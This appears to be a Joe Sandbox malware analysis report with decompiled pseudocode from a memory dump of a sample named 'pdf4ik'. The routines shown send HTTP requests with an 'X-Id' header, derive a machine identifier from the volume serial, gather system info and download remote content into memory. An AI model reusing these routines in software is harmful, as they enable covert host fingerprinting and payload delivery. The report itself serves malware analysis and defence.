                                        							_t464 = E29D8E880(_t556,  &_v2584);
                                        							_v8 = 0x19;
                                        							E29D89930("X-Id: ",  &_v2304, _t464);
                                        							_t661 = _t659 + 4;
                                        							_v8 = 0x1b;
                                        							if(_v2564 >= 0x10) {
                                        								_push(_v2584);
                                        								E29DADF3B();
                                        								_t661 = _t661 + 4;
                                        							}
                                        							_t467 = _v2304;
                                        							_v2564 = 0xf;
                                        							_v2568 = 0;
                                        							_v2584 = 0;
                                        							if(_v2284 < 0x10) {
                                        								_t467 =  &_v2304;
                                        							}
                                        							HttpAddRequestHeadersA(_t534, _t467, _v2288, 0x20000000);
                                        							_t469 = HttpSendRequestA(_t534, 0, 0, 0, 0); // executed
                                        							_t596 =  &_v2588;
                                        							_t647 = _t469;
                                        							_v2588 = 0x100;
                                        							if(HttpQueryInfoA(_t534, 0x13,  &_v276,  &_v2588, 0) != 0) {
                                        								_push( &_v276);
                                        								_t472 = E29DAEC33();
                                        								_t659 = _t661 + 4;
                                        								__eflags = _t472 - 0xc8;
                                        								if(_t472 != 0xc8) {
                                        									goto L125;
                                        								}
                                        								__eflags = _t647;
                                        								if(_t647 == 0) {
                                        									L133:
                                        									InternetCloseHandle(_t534);
                                        									_v8 = 8;
                                        									E29D89160( &_v2304);
                                        									_t621 = _v2608;
                                        									goto L134;
                                        								}
                                        								_t596 =  &_v2596;
                                        								_t487 = InternetReadFile(_t534,  &_v2276, 0x7cf,  &_v2596); // executed
                                        								__eflags = _t487;
                                        								if(_t487 == 0) {
                                        									goto L133;
                                        								} else {
                                        									goto L129;
                                        								}
                                        								while(1) {
                                        									L129:
                                        									_t488 = _v2596;
                                        									__eflags = _t488;
                                        									if(_t488 == 0) {
                                        										goto L133;
                                        									}
                                        									 *((char*)(_t655 + _t488 - 0x8e0)) = 0;
                                        									_t490 = E29D95460( &_v2360,  &_v2500,  &_v2276); // executed
                                        									_t659 = _t659 + 0xc;
                                        									_v8 = 0x1c;
                                        									E29D891D0(_t490,  &_v2500);
                                        									_v8 = 0x1b;
                                        									__eflags = _v2340 - 0x10;
                                        									if(_v2340 >= 0x10) {
                                        										_push(_v2360);
                                        										E29DADF3B();
                                        										_t659 = _t659 + 4;
                                        									}
                                        									_t596 =  &_v2596;
                                        									_v2340 = 0xf;
                                        									_v2344 = 0;
                                        									_v2360 = 0;
                                        									_t493 = InternetReadFile(_t534,  &_v2276, 0x7cf,  &_v2596); // executed
                                        									__eflags = _t493;
                                        									if(_t493 != 0) {
                                        										continue;
                                        									} else {
                                        										goto L133;
                                        									}
                                        								}
                                        								goto L133;
                                        							} else {
                                        								L125:
                                        								_t648 = _v2604;
                                        								E29D89100(_t648, "ERROR");
                                        								E29D89160( &_v2304);
                                        								E29D89160( &_v2556);
                                        								E29D89160( &_v2472);
                                        								E29D89160( &_v2528);
                                        								E29D89160( &_v2332);
                                        								E29D89160( &_v2416);
                                        								E29D89160( &_v2388);
                                        								E29D89160( &_v2500);
                                        								E29D89160( &_a8);
                                        								E29D89160( &_a40);
                                        								_t444 = _t648;
                                        								L155:
                                        								 *[fs:0x0] = _v16;
                                        								_pop(_t620);
                                        								_pop(_t644);
                                        								_pop(_t533);
                                        								return E29DADF46(_t444, _t533, _v20 ^ _t655, _t596, _t620, _t644);
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}
                                        0x29d92375
                                        0x29d92378
                                        0x29d9237d
                                        0x29d9237e
                                        0x29d92383
                                        0x29d92386
                                        0x00000000
                                        0x29d91f45
                                        0x29d91f45
                                        0x29d91f51
                                        0x29d91f53
                                        0x29d91f53
                                        0x29d91f59
                                        0x29d91f6b
                                        0x29d91f71
                                        0x29d91f73
                                        0x29d91f7b
                                        0x29d921fd
                                        0x29d92204
                                        0x00000000
                                        0x29d91f81
                                        0x29d91f88
                                        0x29d91f8e
                                        0x29d91f90
                                        0x29d91f90
                                        0x29d91fa6
                                        0x29d91fac
                                        0x29d91fb0
                                        0x29d921f6
                                        0x29d921f7
                                        0x00000000
                                        0x29d91fb6
                                        0x29d91fbc
                                        0x29d91fcd
                                        0x29d91fd1
                                        0x29d91fd6
                                        0x29d91fde
                                        0x29d91fe8
                                        0x29d91ff0
                                        0x29d91ff1
                                        0x29d91ff6
                                        0x29d91ff6
                                        0x29d91ff9
                                        0x29d91fff
                                        0x29d92009
                                        0x29d92013
                                        0x29d92020
                                        0x29d92022
                                        0x29d92022
                                        0x29d92036
                                        0x29d92045
                                        0x29d9204d
                                        0x29d92054
                                        0x29d92060
                                        0x29d92072
                                        0x29d920ff
                                        0x29d92100
                                        0x29d92105
                                        0x29d92108
                                        0x29d9210d
                                        0x00000000
                                        0x00000000
                                        0x29d92113
                                        0x29d92115
                                        0x29d921da
                                        0x29d921db
                                        0x29d921e7
                                        0x29d921eb
                                        0x29d921f0
                                        0x00000000
                                        0x29d921f0
                                        0x29d9211b
                                        0x29d9212f
                                        0x29d92135
                                        0x29d92137
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9213d
                                        0x29d9213d
                                        0x29d9213d
                                        0x29d92143
                                        0x29d92145
                                        0x00000000
                                        0x00000000
                                        0x29d92158
                                        0x29d92168
                                        0x29d9216d
                                        0x29d92178
                                        0x29d9217c
                                        0x29d92181
                                        0x29d92185
                                        0x29d9218c
                                        0x29d92194
                                        0x29d92195
                                        0x29d9219a
                                        0x29d9219a
                                        0x29d9219d
                                        0x29d921b1
                                        0x29d921bb
                                        0x29d921c5
                                        0x29d921cc
                                        0x29d921d2
                                        0x29d921d4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d921d4
                                        0x00000000
                                        0x29d92078
                                        0x29d92078
                                        0x29d92078
                                        0x29d92085
                                        0x29d92090
                                        0x29d9209b
                                        0x29d920a6
                                        0x29d920b1
                                        0x29d920bc
                                        0x29d920c7
                                        0x29d920d2
                                        0x29d920dd
                                        0x29d920e5
                                        0x29d920ed
                                        0x29d920f2
                                        0x29d9238c
                                        0x29d9238f
                                        0x29d92397
                                        0x29d92398
                                        0x29d92399
                                        0x29d923a7
                                        0x29d923a7
                                        0x29d92072
                                        0x29d91fb0
                                        0x29d91f7b

                                        APIs
                                          • Part of subcall function 29D891D0: _memmove.LIBCMT ref: 29D89203
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D894DA
                                        • DeleteUrlCacheEntry.WININET(?), ref: 29D91E46
                                        • DeleteUrlCacheEntry.WININET(?), ref: 29D91E58
                                          • Part of subcall function 29D894C0: std::_Xinvalid_argument.LIBCPMT ref: 29D89517
                                          • Part of subcall function 29D894C0: _memmove.LIBCMT ref: 29D89578
                                        • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 29D91E83
                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 29D91EDB
                                        • StrCmpCA.SHLWAPI(?,https), ref: 29D91F20
                                        • InternetConnectA.WININET(00000000,?,00000000,00000000,00000000,00000003,-04800000,00000000), ref: 29D91F6B
                                        • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,-04800000,00000000), ref: 29D91FA6
                                        • HttpAddRequestHeadersA.WININET(00000000,00000000,00000000,20000000), ref: 29D92036
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 29D92045
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 29D9206A
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 29D9212F
                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 29D921CC
                                        • InternetCloseHandle.WININET(00000000), ref: 29D921DB
                                        • InternetCloseHandle.WININET(00000000), ref: 29D921F7
                                        • InternetCloseHandle.WININET(00000000), ref: 29D92204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Http$CloseHandleOpenRequest$CacheDeleteEntryFileReadXinvalid_argument_memmovestd::_$ConnectHeadersInfoQuerySend
                                        • String ID: /$ERROR$GET$X-Id: $http://$https$https://
                                        • API String ID: 1077051434-683878127
                                        • Opcode ID: 42ac30d55f53778799bf4be25fa1bb41fa76074ad6de785fdfd91bfcd185898d
                                        • Instruction ID: e20686c158c56b502149ce21da36632993b83c71596f9eb7faf0fd69f1ab660f
                                        • Opcode Fuzzy Hash: 42ac30d55f53778799bf4be25fa1bb41fa76074ad6de785fdfd91bfcd185898d
                                        • Instruction Fuzzy Hash: EB82A9B1D112689AFB20DB24CC84BDEB7B4BF15300F1081EDD54967682DB745B8AEFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E29DA2920(signed short* __edi) {
                                        				char _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v284;
                                        				signed short _v292;
                                        				signed short _v296;
                                        				signed char* _v312;
                                        				signed int _v315;
                                        				signed int _v316;
                                        				signed int _v317;
                                        				signed int _v318;
                                        				signed short _v320;
                                        				signed int _v324;
                                        				signed short _v340;
                                        				signed short _v348;
                                        				signed short _v352;
                                        				signed short _v368;
                                        				signed short _v376;
                                        				signed short _v380;
                                        				signed short _v396;
                                        				signed short _v404;
                                        				signed short _v408;
                                        				signed short _v424;
                                        				signed short _v432;
                                        				signed short _v436;
                                        				signed short _v452;
                                        				intOrPtr _v460;
                                        				signed short _v480;
                                        				long _v484;
                                        				char _v485;
                                        				short _v487;
                                        				char _v488;
                                        				long _v492;
                                        				void* __ebx;
                                        				void* __esi;
                                        				signed int _t127;
                                        				signed int _t128;
                                        				signed int _t136;
                                        				signed int _t138;
                                        				signed int _t146;
                                        				signed int _t148;
                                        				signed int _t150;
                                        				signed int _t152;
                                        				intOrPtr* _t159;
                                        				CHAR* _t162;
                                        				signed short _t166;
                                        				void* _t167;
                                        				void* _t169;
                                        				void* _t170;
                                        				void* _t171;
                                        				intOrPtr* _t173;
                                        				signed short _t200;
                                        				signed short _t201;
                                        				signed short _t203;
                                        				signed int _t209;
                                        				signed char* _t210;
                                        				signed char** _t211;
                                        				signed short _t212;
                                        				void* _t213;
                                        				char _t217;
                                        				signed char* _t219;
                                        				signed char* _t220;
                                        				intOrPtr _t237;
                                        				char* _t241;
                                        				signed short* _t248;
                                        				CHAR* _t251;
                                        				signed char* _t252;
                                        				intOrPtr* _t257;
                                        				void* _t258;
                                        				signed short _t259;
                                        				signed int _t260;
                                        				void* _t261;
                                        				void* _t262;
                                        				void* _t263;
                                        
                                        				_t248 = __edi;
                                        				_push(0xffffffff);
                                        				_push(E29DC24FD);
                                        				_push( *[fs:0x0]);
                                        				_t262 = _t261 - 0x1dc;
                                        				_t127 =  *0x29dd5664; // 0xd9555f04
                                        				_t128 = _t127 ^ _t260;
                                        				_v20 = _t128;
                                        				_push(_t128);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v484 = 0;
                                        				_v492 = 0;
                                        				_v292 = 0xf;
                                        				_v296 = 0;
                                        				_v312 = 0;
                                        				_v8 = 0;
                                        				if(GetWindowsDirectoryA( &_v284, 0x104) == 0) {
                                        					_v284 = 0x43;
                                        				}
                                        				_v488 = _v284;
                                        				_v487 = 0x5c3a;
                                        				_v485 = 0;
                                        				GetVolumeInformationA( &_v488, 0, 0,  &_v492, 0, 0, 0, 0); // executed
                                        				_t136 = _v492 * 0x14a30b - 0x69427551;
                                        				_t209 = _t136;
                                        				_t138 = _t136 * 0x14a30b - 0x69427551;
                                        				_v324 = _t138;
                                        				_t146 = (((_t138 * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551;
                                        				_v318 = _t146;
                                        				_t148 = _t146 * 0x14a30b - 0x69427551;
                                        				_v317 = _t148;
                                        				_t150 = _t148 * 0x14a30b - 0x69427551;
                                        				_v316 = _t150;
                                        				_t152 = _t150 * 0x14a30b - 0x69427551;
                                        				_v315 = _t152;
                                        				_v492 = (_t152 * 0x14a30b - 0x69427551) * 0x14a30b - 0x69427551;
                                        				_t251 = HeapAlloc(GetProcessHeap(), 0, 0x104);
                                        				_t159 = 0;
                                        				if(_t251 != 0) {
                                        					wsprintfA(_t251, "%08lX%04lX%lu-", _t209, _v324 & 0x0000ffff, _v318);
                                        					_t162 = _t251;
                                        					_t263 = _t262 + 0x14;
                                        					_t38 =  &(_t162[1]); // 0x1
                                        					_t241 = _t38;
                                        					do {
                                        						_t217 =  *_t162;
                                        						_t162 =  &(_t162[1]);
                                        					} while (_t217 != 0);
                                        					E29D95540(_t251,  &_v312, _t162 - _t241);
                                        					_t166 = _v292;
                                        					_t252 = _v312;
                                        					_t210 = _t252;
                                        					if(_t166 >= 0x10) {
                                        						_t219 = _t252;
                                        					} else {
                                        						_t210 =  &_v312;
                                        						_t219 = _t210;
                                        					}
                                        					_t220 =  &(_t219[_v296]);
                                        					_v484 = _t220;
                                        					if(_t166 < 0x10) {
                                        						_t252 =  &_v312;
                                        					}
                                        					if(_t252 == _t220) {
                                        						L31:
                                        						_t167 = E29DA3460(_t210, _t248,  &_v480); // executed
                                        						_v8 = 1;
                                        						_v484 = E29D951E0(0x14, _t167,  &_v452, 0x11);
                                        						_v8 = 2;
                                        						_t169 = E29DA34D0(_t210, _t248,  &_v396); // executed
                                        						_v8 = 3;
                                        						_t170 = E29D951E0(0, _t169,  &_v424, 0x18);
                                        						_t211 =  &_v312;
                                        						_v8 = 4;
                                        						_t171 = E29DA42C0(_t170, _t211, _t170,  &_v368);
                                        						_t244 =  &_v340;
                                        						_v8 = 5;
                                        						_t173 = E29D89980(_v484, _t171,  &_v340);
                                        						_t262 = _t263 + 8;
                                        						_t257 = _t173;
                                        						if(_t211 == _t257) {
                                        							_t212 = 0;
                                        						} else {
                                        							if(_v292 >= 0x10) {
                                        								_push(_v312);
                                        								E29DADF3B();
                                        								_t262 = _t262 + 4;
                                        							}
                                        							_t212 = 0;
                                        							_v292 = 0xf;
                                        							_v296 = 0;
                                        							_v312 = 0;
                                        							if( *(_t257 + 0x14) >= 0x10) {
                                        								_v312 =  *_t257;
                                        								 *_t257 = 0;
                                        							} else {
                                        								E29DAE1F0( &_v312, _t257,  *(_t257 + 0x10) + 1);
                                        								_t262 = _t262 + 0xc;
                                        							}
                                        							_v296 =  *(_t257 + 0x10);
                                        							_t244 =  *(_t257 + 0x14);
                                        							_v292 =  *(_t257 + 0x14);
                                        							 *(_t257 + 0x10) = _t212;
                                        							 *(_t257 + 0x14) = _t212;
                                        						}
                                        						if(_v320 >= 0x10) {
                                        							_push(_v340);
                                        							E29DADF3B();
                                        							_t262 = _t262 + 4;
                                        						}
                                        						_v320 = 0xf;
                                        						_v324 = _t212;
                                        						_v340 = _t212;
                                        						if(_v348 >= 0x10) {
                                        							_push(_v368);
                                        							E29DADF3B();
                                        							_t262 = _t262 + 4;
                                        						}
                                        						_v348 = 0xf;
                                        						_v352 = _t212;
                                        						_v368 = _t212;
                                        						if(_v404 >= 0x10) {
                                        							_t244 = _v424;
                                        							_push(_v424);
                                        							E29DADF3B();
                                        							_t262 = _t262 + 4;
                                        						}
                                        						_v404 = 0xf;
                                        						_v408 = _t212;
                                        						_v424 = _t212;
                                        						if(_v376 >= 0x10) {
                                        							_push(_v396);
                                        							E29DADF3B();
                                        							_t262 = _t262 + 4;
                                        						}
                                        						_v376 = 0xf;
                                        						_v380 = _t212;
                                        						_v396 = _t212;
                                        						if(_v432 >= 0x10) {
                                        							_push(_v452);
                                        							E29DADF3B();
                                        							_t262 = _t262 + 4;
                                        						}
                                        						_v432 = 0xf;
                                        						_v436 = _t212;
                                        						_v452 = _t212;
                                        						if(_v460 >= 0x10) {
                                        							_t244 = _v480;
                                        							_push(_v480);
                                        							E29DADF3B();
                                        							_t262 = _t262 + 4;
                                        						}
                                        						_t248[0xa] = 0xf;
                                        						_t248[8] = _t212;
                                        						 *_t248 = _t212;
                                        						if(_t248 ==  &_v312) {
                                        							if(_v292 < 0x10) {
                                        								goto L61;
                                        							}
                                        							_push(_v312);
                                        							L60:
                                        							E29DADF3B();
                                        							goto L61;
                                        						} else {
                                        							if(_t248[0xa] >= 0x10) {
                                        								_push( *_t248);
                                        								E29DADF3B();
                                        								_t262 = _t262 + 4;
                                        							}
                                        							_t248[0xa] = 0xf;
                                        							_t248[8] = _t212;
                                        							 *_t248 = _t212;
                                        							if(_v292 >= 0x10) {
                                        								_t244 = _v296;
                                        								 *_t248 = _v312;
                                        								_t248[8] = _v296;
                                        								_t248[0xa] = _v292;
                                        							} else {
                                        								E29DAE1F0(_t248,  &_v312, _v296 + 1);
                                        								_t244 = _v296;
                                        								_t248[8] = _v296;
                                        								_t248[0xa] = _v292;
                                        							}
                                        							L61:
                                        							 *[fs:0x0] = _v16;
                                        							_pop(_t258);
                                        							_pop(_t213);
                                        							return E29DADF46(_t248, _t213, _v20 ^ _t260, _t244, _t248, _t258);
                                        						}
                                        					} else {
                                        						_t210 = _t210 - _t252;
                                        						do {
                                        							_t252[_t210] = E29DAFC0B( *_t252 & 0x000000ff);
                                        							_t252 =  &(_t252[1]);
                                        							_t263 = _t263 + 4;
                                        						} while (_t252 != _v484);
                                        						goto L31;
                                        					}
                                        				}
                                        				_t248[0xa] = 0xf;
                                        				_t248[8] = 0;
                                        				 *_t248 = 0;
                                        				_t26 = _t159 + 1; // 0x1
                                        				_t244 = _t26;
                                        				do {
                                        					_t237 =  *_t159;
                                        					_t159 = _t159 + 1;
                                        				} while (_t237 != 0);
                                        				_t259 = _t159 - _t244;
                                        				if(_t259 > 0xfffffffe) {
                                        					E29DAD440("string too long");
                                        				}
                                        				_t200 = _t248[0xa];
                                        				if(_t200 >= _t259) {
                                        					if(_t259 != 0) {
                                        						goto L9;
                                        					}
                                        					_t248[8] = _t259;
                                        					if(_t200 < 0x10) {
                                        						 *_t248 = 0;
                                        					} else {
                                        						 *( *_t248) = 0;
                                        					}
                                        				} else {
                                        					E29D89750(_t248, _t259, _t248[8]);
                                        					if(_t259 == 0) {
                                        						L20:
                                        						if(_v292 < 0x10) {
                                        							goto L61;
                                        						}
                                        						_t244 = _v312;
                                        						_push(_v312);
                                        						goto L60;
                                        					}
                                        					L9:
                                        					if(_t248[0xa] < 0x10) {
                                        						_t201 = _t248;
                                        					} else {
                                        						_t201 =  *_t248;
                                        					}
                                        					E29DB0010(_t201, 0, _t259);
                                        					_t262 = _t262 + 0xc;
                                        					_t248[8] = _t259;
                                        					if(_t248[0xa] < 0x10) {
                                        						_t203 = _t248;
                                        					} else {
                                        						_t203 =  *_t248;
                                        					}
                                        					 *((char*)(_t203 + _t259)) = 0;
                                        				}
                                        			}

                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,D9555F04,00000010), ref: 29DA2981
                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 29DA29C2
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 29DA2A74
                                        • HeapAlloc.KERNEL32(00000000), ref: 29DA2A7B
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA2AB5
                                        • _memmove.LIBCMT ref: 29DA2AFF
                                        • wsprintfA.USER32 ref: 29DA2B48
                                        • _memmove.LIBCMT ref: 29DA2C93
                                        • _memmove.LIBCMT ref: 29DA2E14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memmove$Heap$AllocDirectoryInformationProcessVolumeWindowsXinvalid_argumentstd::_wsprintf
                                        • String ID: %08lX%04lX%lu-$:\$C$string too long
                                        • API String ID: 1185697149-3491094078
                                        • Opcode ID: 484d33e7350fb22ebf2ef8ca5b29c3eada7eb879582b8ff944bbec85ffd36a17
                                        • Instruction ID: 68b0f8525603ba0005fb17fe5221cd79f95fd690648c11fc7b1db77bfb739f84
                                        • Opcode Fuzzy Hash: 484d33e7350fb22ebf2ef8ca5b29c3eada7eb879582b8ff944bbec85ffd36a17
                                        • Instruction Fuzzy Hash: DBE1DE719052699BCB25CF28CD84BCABBB4BF18300F0046EDD549A7A41D770ABA5DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E29DA2E90(intOrPtr* __esi, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				char _v48;
                                        				intOrPtr _v52;
                                        				struct _SYSTEM_INFO _v88;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t17;
                                        				signed int _t18;
                                        				intOrPtr* _t21;
                                        				intOrPtr* _t22;
                                        				intOrPtr _t31;
                                        				intOrPtr _t33;
                                        				void* _t41;
                                        				intOrPtr _t42;
                                        				intOrPtr* _t43;
                                        				signed int _t44;
                                        				void* _t48;
                                        
                                        				_t48 = __eflags;
                                        				_t43 = __esi;
                                        				_push(0xffffffff);
                                        				_push(E29DC2F28);
                                        				_push( *[fs:0x0]);
                                        				_t17 =  *0x29dd5664; // 0xd9555f04
                                        				_t18 = _t17 ^ _t44;
                                        				_v20 = _t18;
                                        				_push(_t18);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v52 = 0;
                                        				GetSystemInfo( &_v88); // executed
                                        				_t21 = E29DA4720( &_v48, _t48, _v88.dwNumberOfProcessors);
                                        				_v8 = 0;
                                        				if( *((intOrPtr*)(_t21 + 0x14)) < 0x10) {
                                        					_t39 = _t21;
                                        				} else {
                                        					_t39 =  *_t21;
                                        				}
                                        				_t22 = _t39;
                                        				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                        				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                        				 *_t43 = 0;
                                        				_t11 = _t22 + 1; // 0x1
                                        				_t41 = _t11;
                                        				do {
                                        					_t33 =  *_t22;
                                        					_t22 = _t22 + 1;
                                        				} while (_t33 != 0);
                                        				E29D892C0(_t43, _t39, _t22 - _t41);
                                        				if(_v28 >= 0x10) {
                                        					_t39 = _v48;
                                        					_push(_v48);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t42);
                                        				_pop(_t31);
                                        				return E29DADF46(_t43, _t31, _v20 ^ _t44, _t39, _t42, _t43);
                                        			}

                                        APIs
                                        • GetSystemInfo.KERNEL32(D9555F04,D9555F04,00000010,00000000), ref: 29DA2EC5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoSystem
                                        • String ID:
                                        • API String ID: 31276548-0
                                        • Opcode ID: c10801662114759129fc37b4c2aecffe57c61a552d3065ece15ad456e4cbd355
                                        • Instruction ID: 1c19868b77a299c14ad0d05cc2e15228f3c315d1ed0e20a904b0501bcfa08e7c
                                        • Opcode Fuzzy Hash: c10801662114759129fc37b4c2aecffe57c61a552d3065ece15ad456e4cbd355
                                        • Instruction Fuzzy Hash: 9B11E471A04288EFC714CF69D884BAFB7F9FB49700F10862DD91697640DB305A09CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1586 29d986a0-29d98741 call 29db5640 * 2 lstrlenA InternetCrackUrlA 1591 29d98748-29d98756 StrCmpCA 1586->1591 1592 29d98743 1586->1592 1593 29d98758 1591->1593 1594 29d9875b-29d98778 GetProcessHeap RtlAllocateHeap 1591->1594 1592->1591 1593->1594 1595 29d9877a 1594->1595 1596 29d9877d-29d987b2 InternetOpenA InternetSetOptionA 1594->1596 1595->1596 1597 29d987b4-29d987c5 1596->1597 1598 29d987c7-29d987d7 1596->1598 1599 29d987d8-29d987e8 InternetOpenUrlA 1597->1599 1598->1599 1600 29d9883a-29d98852 InternetCloseHandle * 2 1599->1600 1601 29d987ea 1599->1601 1603 29d98860-29d9887f call 29dadf46 1600->1603 1604 29d98854-29d9885d call 29dadf3b 1600->1604 1602 29d987f0-29d98812 InternetReadFile 1601->1602 1602->1600 1606 29d98814 1602->1606 1604->1603 1610 29d98820-29d98834 1606->1610 1610->1610 1611 29d98836-29d98838 1610->1611 1611->1600 1611->1602
                                        C-Code - Quality: 36%
                                        			E29D986A0(CHAR* __ecx, char* _a4, intOrPtr _a24) {
                                        				long _v8;
                                        				char _v16;
                                        				signed int _v24;
                                        				char _v88;
                                        				void _v1112;
                                        				long _v1116;
                                        				void* _v1120;
                                        				void _v1124;
                                        				intOrPtr _v1176;
                                        				char* _v1180;
                                        				void* _v1184;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t36;
                                        				signed int _t37;
                                        				int _t44;
                                        				char* _t45;
                                        				void* _t46;
                                        				void* _t48;
                                        				char* _t49;
                                        				void* _t50;
                                        				void* _t53;
                                        				void* _t61;
                                        				void* _t63;
                                        				void* _t64;
                                        				void* _t65;
                                        				long _t75;
                                        				void* _t82;
                                        				void* _t83;
                                        				CHAR* _t85;
                                        				void* _t86;
                                        				void* _t87;
                                        				signed int _t88;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC1D58);
                                        				_push( *[fs:0x0]);
                                        				_t36 =  *0x29dd5664; // 0xd9555f04
                                        				_t37 = _t36 ^ _t88;
                                        				_v24 = _t37;
                                        				_push(_t37);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t85 = __ecx;
                                        				_t63 = 0;
                                        				_v8 = 0;
                                        				_v1116 = 1;
                                        				E29DB5640( &_v88, 0, 0x40);
                                        				E29DB5640( &_v1184, 0, 0x3c);
                                        				_v1184 = 0x3c;
                                        				_v1180 =  &_v88;
                                        				_v1176 = 0x40;
                                        				_t44 = InternetCrackUrlA(_t85, lstrlenA(_t85), 0x10000000,  &_v1184);
                                        				_t45 = _v1180;
                                        				if(_t44 == 0) {
                                        					_t45 = "http";
                                        				}
                                        				_t46 =  *0x29dd8550(_t45, "https");
                                        				if(_t46 == 0) {
                                        					_t13 = _t46 + 1; // 0x1
                                        					_t63 = _t13;
                                        				}
                                        				_t48 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
                                        				_t82 = _t48;
                                        				_t49 = _a4;
                                        				if(_a24 < 0x10) {
                                        					_t49 =  &_a4;
                                        				}
                                        				_t50 = InternetOpenA(_t49, 0, 0, 0, 0);
                                        				_v1120 = _t50;
                                        				_v1124 = 0x927c0;
                                        				InternetSetOptionA(_t50, 2,  &_v1124, 4);
                                        				_push(0);
                                        				if(_t63 == 0) {
                                        					_push(0x4000100);
                                        					_push(0);
                                        					_push(0);
                                        					_push(_t85);
                                        					_push(_v1120);
                                        				} else {
                                        					_push(0x4800100);
                                        					_push(0);
                                        					_push(0);
                                        					_push(_t85);
                                        					_push(_v1120);
                                        				}
                                        				_t53 = InternetOpenUrlA();
                                        				_t86 = 0;
                                        				_t64 = _t53;
                                        				if(_v1116 > 0) {
                                        					while(1) {
                                        						InternetReadFile(_t64,  &_v1112, 0x400,  &_v1116); // executed
                                        						_t61 = 0;
                                        						if(_v1116 <= 0) {
                                        							goto L15;
                                        						}
                                        						do {
                                        							 *((char*)(_t86 + _t82)) =  *((intOrPtr*)(_t88 + _t61 - 0x454));
                                        							_t75 = _v1116;
                                        							_t61 = _t61 + 1;
                                        							_t86 = _t86 + 1;
                                        						} while (_t61 < _t75);
                                        						if(_t75 != 0) {
                                        							continue;
                                        						}
                                        						goto L15;
                                        					}
                                        				}
                                        				L15:
                                        				InternetCloseHandle(_t64);
                                        				InternetCloseHandle(_v1120);
                                        				if(_a24 >= 0x10) {
                                        					_push(_a4);
                                        					E29DADF3B();
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t83);
                                        				_pop(_t87);
                                        				_pop(_t65);
                                        				return E29DADF46(_t82, _t65, _v24 ^ _t88, _t86, _t83, _t87);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D986EA
                                        • _memset.LIBCMT ref: 29D986F9
                                        • lstrlenA.KERNEL32(?,10000000,00000000,?,?,D9555F04), ref: 29D9872B
                                        • InternetCrackUrlA.WININET(?,00000000), ref: 29D98733
                                        • StrCmpCA.SHLWAPI(?,https,?,?,D9555F04), ref: 29D9874E
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,D9555F04), ref: 29D98762
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,D9555F04), ref: 29D98769
                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 29D98786
                                        • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 29D987A8
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,04000100,00000000), ref: 29D987D8
                                        • InternetReadFile.WININET(00000000,?,00000400,00000001), ref: 29D98804
                                        • InternetCloseHandle.WININET(00000000), ref: 29D9883B
                                        • InternetCloseHandle.WININET(?), ref: 29D98848
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
